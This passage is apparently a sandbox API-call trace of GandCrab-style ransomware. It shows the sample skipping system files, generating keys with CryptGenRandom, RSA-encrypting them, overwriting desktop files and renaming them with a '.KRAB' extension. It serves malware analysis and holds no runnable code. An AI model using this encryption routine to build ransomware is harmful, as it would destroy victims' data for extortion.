lpString2="KRAB-DECRYPT.html") returned 1 [0087.692] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0087.692] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0087.692] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="ntldr") returned 1 [0087.692] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="NTDETECT.COM") returned 1 [0087.692] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="Bootfont.bin") returned 1 [0087.692] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.692] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011238) returned 1 [0087.694] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.694] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.694] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.694] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0087.694] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0087.694] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.695] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0087.696] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.696] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.697] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.697] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0087.697] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0087.697] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.697] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010bd8) returned 1 [0087.699] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1022ff8) returned 1 [0087.699] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0087.699] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0087.699] GetLastError () returned 0x0 [0087.699] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0087.699] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0087.699] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0087.701] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023278) returned 1 [0087.701] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0087.701] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0087.701] GetLastError () returned 0x0 [0087.701] CryptDestroyKey (hKey=0x1023278) returned 1 [0087.701] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0087.701] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\p-v4c7pnfwf7jxz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0087.702] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0087.702] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0087.703] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x189a6, lpOverlapped=0x0) returned 1 [0087.744] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffe765a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.744] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x189a6, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x189a6, lpOverlapped=0x0) returned 1 [0087.745] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0087.745] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.749] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.749] CloseHandle (hObject=0x3a8) returned 1 [0087.750] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.750] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\p-v4c7pnfwf7jxz.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\p-v4c7pnfwf7jxz.docx.krab")) returned 1 [0087.751] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.751] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0087.751] FindClose (in: hFindFile=0x1023238 | out: hFindFile=0x1023238) returned 1 [0087.751] CloseHandle (hObject=0x434) returned 1 [0087.751] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0087.751] lstrcmpW (lpString1="LfiXbB.bmp", lpString2=".") returned 1 [0087.751] lstrcmpW (lpString1="LfiXbB.bmp", lpString2="..") returned 1 [0087.751] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="LfiXbB.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp" [0087.751] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.752] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp.KRAB") returned 45 [0087.752] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp") returned 40 [0087.752] lstrlenW (lpString=".bmp") returned 4 [0087.753] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.753] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0087.753] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.753] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp") returned 40 [0087.754] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp") returned 40 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="desktop.ini") returned 1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="autorun.inf") returned 1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="ntuser.dat") returned -1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="iconcache.db") returned 1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="bootsect.bak") returned 1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="boot.ini") returned 1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="ntuser.dat.log") returned -1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="thumbs.db") returned -1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="ntldr") returned -1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="NTDETECT.COM") returned -1 [0087.754] lstrcmpiW (lpString1="LfiXbB.bmp", lpString2="Bootfont.bin") returned 1 [0087.754] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.754] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0087.756] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.757] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.757] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.757] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0087.757] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0087.757] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.757] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10114e0) returned 1 [0087.759] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.759] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.760] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.760] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0087.760] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0087.760] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.760] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0087.762] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0087.762] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0087.762] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0087.762] GetLastError () returned 0x0 [0087.763] CryptDestroyKey (hKey=0x10231f8) returned 1 [0087.763] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0087.763] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0087.764] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0087.764] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0087.764] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0087.765] GetLastError () returned 0x0 [0087.765] CryptDestroyKey (hKey=0x10234f8) returned 1 [0087.765] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0087.765] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lfixbb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0087.766] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0087.766] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0087.766] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xe9ba, lpOverlapped=0x0) returned 1 [0087.780] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff1646, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.780] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xe9ba, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xe9ba, lpOverlapped=0x0) returned 1 [0087.780] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0087.780] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.917] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.917] CloseHandle (hObject=0x434) returned 1 [0087.917] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.918] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lfixbb.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\LfiXbB.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lfixbb.bmp.krab")) returned 1 [0087.918] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.919] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0087.919] lstrcmpW (lpString1="Rj0V4huA0hz2nx.doc", lpString2=".") returned 1 [0087.919] lstrcmpW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="..") returned 1 [0087.919] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="Rj0V4huA0hz2nx.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc" [0087.919] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.919] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc.KRAB") returned 53 [0087.919] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc") returned 48 [0087.919] lstrlenW (lpString=".doc") returned 4 [0087.919] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.920] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".doc ") returned 5 [0087.920] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.920] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc") returned 48 [0087.920] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc") returned 48 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="desktop.ini") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="autorun.inf") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="ntuser.dat") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="iconcache.db") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="bootsect.bak") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="boot.ini") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="ntuser.dat.log") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="thumbs.db") returned -1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="KRAB-DECRYPT.html") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="KRAB-DECRYPT.txt") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="CRAB-DECRYPT.txt") returned 1 [0087.920] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="ntldr") returned 1 [0087.921] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="NTDETECT.COM") returned 1 [0087.921] lstrcmpiW (lpString1="Rj0V4huA0hz2nx.doc", lpString2="Bootfont.bin") returned 1 [0087.921] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.923] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0087.924] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.925] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.925] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.925] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0087.925] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0087.925] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.925] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010bd8) returned 1 [0087.927] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.927] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.927] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.928] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0087.928] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0087.928] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.928] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010a40) returned 1 [0087.929] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0087.929] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0087.930] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0087.930] GetLastError () returned 0x0 [0087.930] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0087.930] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0087.930] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0087.931] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0087.931] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0087.932] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0087.932] GetLastError () returned 0x0 [0087.932] CryptDestroyKey (hKey=0x10231f8) returned 1 [0087.932] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0087.932] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rj0v4hua0hz2nx.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0087.933] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0087.933] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0087.933] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x2769, lpOverlapped=0x0) returned 1 [0087.946] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd897, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.946] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2769, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x2769, lpOverlapped=0x0) returned 1 [0087.994] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0087.994] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.998] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.998] CloseHandle (hObject=0x434) returned 1 [0087.999] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.999] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rj0v4hua0hz2nx.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rj0V4huA0hz2nx.doc.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rj0v4hua0hz2nx.doc.krab")) returned 1 [0088.000] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.000] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.000] lstrcmpW (lpString1="Rr9S3tnzL.m4a", lpString2=".") returned 1 [0088.000] lstrcmpW (lpString1="Rr9S3tnzL.m4a", lpString2="..") returned 1 [0088.001] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="Rr9S3tnzL.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a" [0088.001] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.001] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a.KRAB") returned 48 [0088.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a") returned 43 [0088.001] lstrlenW (lpString=".m4a") returned 4 [0088.001] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.001] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0088.001] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a") returned 43 [0088.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a") returned 43 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="desktop.ini") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="autorun.inf") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="ntuser.dat") returned 1 [0088.002] lstrcmpiW 